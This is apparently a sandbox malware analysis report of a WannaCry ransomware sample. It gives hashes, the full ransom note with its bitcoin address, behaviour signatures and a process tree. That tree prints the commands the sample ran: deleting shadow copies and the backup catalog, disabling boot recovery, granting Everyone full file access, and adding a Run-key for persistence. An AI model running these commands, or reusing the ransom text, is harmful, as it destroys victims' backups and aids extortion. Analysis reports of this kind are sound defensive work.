Analysis

  • max time kernel
    1799s
  • max time network
    1508s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-es
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-eslocale:es-esos:windows10-2004-x64systemwindows
  • submitted
    23-02-2023 14:00

General

  • Target

    u0.dll

  • Size

    191KB

  • MD5

    eab9caf4277829abdf6223ec1efa0edd

  • SHA1

    74862ecf349a9bedd32699f2a7a4e00b4727543d

  • SHA256

    a4efbdb2ce55788ffe92a244cb775efd475526ef5b61ad78de2bcdfaddac7041

  • SHA512

    45b15ade68e0a90ea7300aeb6dca9bc9e347a63dba5ce72a635957564d1bdf0b1584a5e34191916498850fc7b3b7ecfbcbfcb246b39dbf59d47f66bc825c6fd2

  • SSDEEP

    3072:OXoiFK6b0k77I+QfaIl191rSJHvlalB+8BHkY6v53EfcUzN0m6I+WxBlnKzeZuqt:OXoQNb++gDrSJdr8BHkPh3wIgnK/IU1a

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@Please_Read_Me@.txt

Family

wannacry

Ransom Note
Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �
Wallets

12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw

Signatures

  • Wannacry

    WannaCry is a ransomware cryptoworm.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies extensions of user files 8 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 64 IoCs
  • Loads dropped DLL 8 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in System32 directory 6 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 8 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs .reg file with regedit 1 IoCs
  • Runs regedit.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 4 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 34 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\u0.dll,#1
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:5100
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\u0.dll,#1
      2⤵
        PID:5060
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 5060 -s 648
          3⤵
          • Program crash
          PID:1448
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 196 -p 5060 -ip 5060
      1⤵
        PID:1100
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe"
        1⤵
        • Adds Run key to start application
        • Enumerates system info in registry
        • Modifies data under HKEY_USERS
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:2152
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb9e8d9758,0x7ffb9e8d9768,0x7ffb9e8d9778
          2⤵
            PID:2792
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1848 --field-trial-handle=1824,i,12967992524583069189,7237768307272258601,131072 /prefetch:2
            2⤵
              PID:3804
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=1824,i,12967992524583069189,7237768307272258601,131072 /prefetch:8
              2⤵
                PID:544
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2260 --field-trial-handle=1824,i,12967992524583069189,7237768307272258601,131072 /prefetch:8
                2⤵
                  PID:216
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3172 --field-trial-handle=1824,i,12967992524583069189,7237768307272258601,131072 /prefetch:1
                  2⤵
                    PID:2076
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3308 --field-trial-handle=1824,i,12967992524583069189,7237768307272258601,131072 /prefetch:1
                    2⤵
                      PID:4688
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4508 --field-trial-handle=1824,i,12967992524583069189,7237768307272258601,131072 /prefetch:1
                      2⤵
                        PID:2320
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4696 --field-trial-handle=1824,i,12967992524583069189,7237768307272258601,131072 /prefetch:8
                        2⤵
                          PID:4212
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4544 --field-trial-handle=1824,i,12967992524583069189,7237768307272258601,131072 /prefetch:8
                          2⤵
                            PID:1340
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4900 --field-trial-handle=1824,i,12967992524583069189,7237768307272258601,131072 /prefetch:8
                            2⤵
                              PID:4812
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5084 --field-trial-handle=1824,i,12967992524583069189,7237768307272258601,131072 /prefetch:8
                              2⤵
                                PID:1028
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4988 --field-trial-handle=1824,i,12967992524583069189,7237768307272258601,131072 /prefetch:8
                                2⤵
                                  PID:4272
                                • C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe
                                  "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe" --reenable-autoupdates --system-level
                                  2⤵
                                    PID:2548
                                    • C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe
                                      "C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x238,0x23c,0x240,0x214,0x244,0x7ff75fb97688,0x7ff75fb97698,0x7ff75fb976a8
                                      3⤵
                                        PID:4016
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5016 --field-trial-handle=1824,i,12967992524583069189,7237768307272258601,131072 /prefetch:8
                                      2⤵
                                        PID:664
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4900 --field-trial-handle=1824,i,12967992524583069189,7237768307272258601,131072 /prefetch:8
                                        2⤵
                                          PID:4268
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4452 --field-trial-handle=1824,i,12967992524583069189,7237768307272258601,131072 /prefetch:1
                                          2⤵
                                            PID:1572
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=2696 --field-trial-handle=1824,i,12967992524583069189,7237768307272258601,131072 /prefetch:1
                                            2⤵
                                              PID:1156
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4680 --field-trial-handle=1824,i,12967992524583069189,7237768307272258601,131072 /prefetch:2
                                              2⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:3304
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=4620 --field-trial-handle=1824,i,12967992524583069189,7237768307272258601,131072 /prefetch:1
                                              2⤵
                                                PID:3780
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=3184 --field-trial-handle=1824,i,12967992524583069189,7237768307272258601,131072 /prefetch:1
                                                2⤵
                                                  PID:2544
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5100 --field-trial-handle=1824,i,12967992524583069189,7237768307272258601,131072 /prefetch:8
                                                  2⤵
                                                    PID:3696
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5080 --field-trial-handle=1824,i,12967992524583069189,7237768307272258601,131072 /prefetch:8
                                                    2⤵
                                                      PID:4012
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=5720 --field-trial-handle=1824,i,12967992524583069189,7237768307272258601,131072 /prefetch:1
                                                      2⤵
                                                        PID:2824
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=4492 --field-trial-handle=1824,i,12967992524583069189,7237768307272258601,131072 /prefetch:1
                                                        2⤵
                                                          PID:2796
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5564 --field-trial-handle=1824,i,12967992524583069189,7237768307272258601,131072 /prefetch:8
                                                          2⤵
                                                            PID:1392
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5772 --field-trial-handle=1824,i,12967992524583069189,7237768307272258601,131072 /prefetch:8
                                                            2⤵
                                                              PID:1588
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=3256 --field-trial-handle=1824,i,12967992524583069189,7237768307272258601,131072 /prefetch:1
                                                              2⤵
                                                                PID:4164
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=1732 --field-trial-handle=1824,i,12967992524583069189,7237768307272258601,131072 /prefetch:1
                                                                2⤵
                                                                  PID:396
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=5400 --field-trial-handle=1824,i,12967992524583069189,7237768307272258601,131072 /prefetch:1
                                                                  2⤵
                                                                    PID:5024
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4596 --field-trial-handle=1824,i,12967992524583069189,7237768307272258601,131072 /prefetch:8
                                                                    2⤵
                                                                      PID:4968
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1824,i,12967992524583069189,7237768307272258601,131072 /prefetch:8
                                                                      2⤵
                                                                        PID:5004
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6000 --field-trial-handle=1824,i,12967992524583069189,7237768307272258601,131072 /prefetch:8
                                                                        2⤵
                                                                          PID:2912
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=5764 --field-trial-handle=1824,i,12967992524583069189,7237768307272258601,131072 /prefetch:1
                                                                          2⤵
                                                                            PID:388
                                                                        • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                                                          "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                                                          1⤵
                                                                            PID:388
                                                                          • C:\Windows\system32\AUDIODG.EXE
                                                                            C:\Windows\system32\AUDIODG.EXE 0x424 0x3d8
                                                                            1⤵
                                                                              PID:4688
                                                                            • C:\Windows\System32\rundll32.exe
                                                                              C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                              1⤵
                                                                                PID:4348
                                                                              • C:\Windows\System32\svchost.exe
                                                                                C:\Windows\System32\svchost.exe -k UnistackSvcGroup
                                                                                1⤵
                                                                                  PID:2316
                                                                                • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"
                                                                                  1⤵
                                                                                  • Modifies extensions of user files
                                                                                  • Drops startup file
                                                                                  • Sets desktop wallpaper using registry
                                                                                  PID:4524
                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                    attrib +h .
                                                                                    2⤵
                                                                                    • Views/modifies file attributes
                                                                                    PID:1092
                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                    icacls . /grant Everyone:F /T /C /Q
                                                                                    2⤵
                                                                                    • Modifies file permissions
                                                                                    PID:1760
                                                                                  • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                    taskdl.exe
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:616
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c 38971677164862.bat
                                                                                    2⤵
                                                                                      PID:856
                                                                                      • C:\Windows\SysWOW64\cscript.exe
                                                                                        cscript.exe //nologo m.vbs
                                                                                        3⤵
                                                                                          PID:4516
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        cmd.exe /c start /b @WanaDecryptor@.exe vs
                                                                                        2⤵
                                                                                          PID:2532
                                                                                          • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                            @WanaDecryptor@.exe vs
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                            PID:3560
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                                                                                              4⤵
                                                                                                PID:3384
                                                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                  wmic shadowcopy delete
                                                                                                  5⤵
                                                                                                    PID:1372
                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                              @WanaDecryptor@.exe co
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                              PID:4500
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exe
                                                                                                TaskData\Tor\taskhsvc.exe
                                                                                                3⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                PID:2728
                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
                                                                                              taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:1628
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "iqtbqgmcp904" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /f
                                                                                              2⤵
                                                                                                PID:4112
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "iqtbqgmcp904" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /f
                                                                                                  3⤵
                                                                                                  • Adds Run key to start application
                                                                                                  • Modifies registry key
                                                                                                  PID:1468
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                                @WanaDecryptor@.exe
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Sets desktop wallpaper using registry
                                                                                                • Suspicious behavior: GetForegroundWindowSpam
                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                PID:1088
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                                taskdl.exe
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4272
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                                taskdl.exe
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:2508
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
                                                                                                taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:368
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                                @WanaDecryptor@.exe
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                PID:2588
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
                                                                                                taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4220
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                                @WanaDecryptor@.exe
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                PID:2560
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                                taskdl.exe
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4272
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
                                                                                                taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:2692
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                                @WanaDecryptor@.exe
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                PID:4516
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                                taskdl.exe
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:2156
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
                                                                                                taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4104
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                                @WanaDecryptor@.exe
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                PID:4248
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                                taskdl.exe
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4680
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
                                                                                                taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:2188
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe
                                                                                                @WanaDecryptor@.exe
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                PID:4544
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
                                                                                                taskdl.exe
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:3152
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
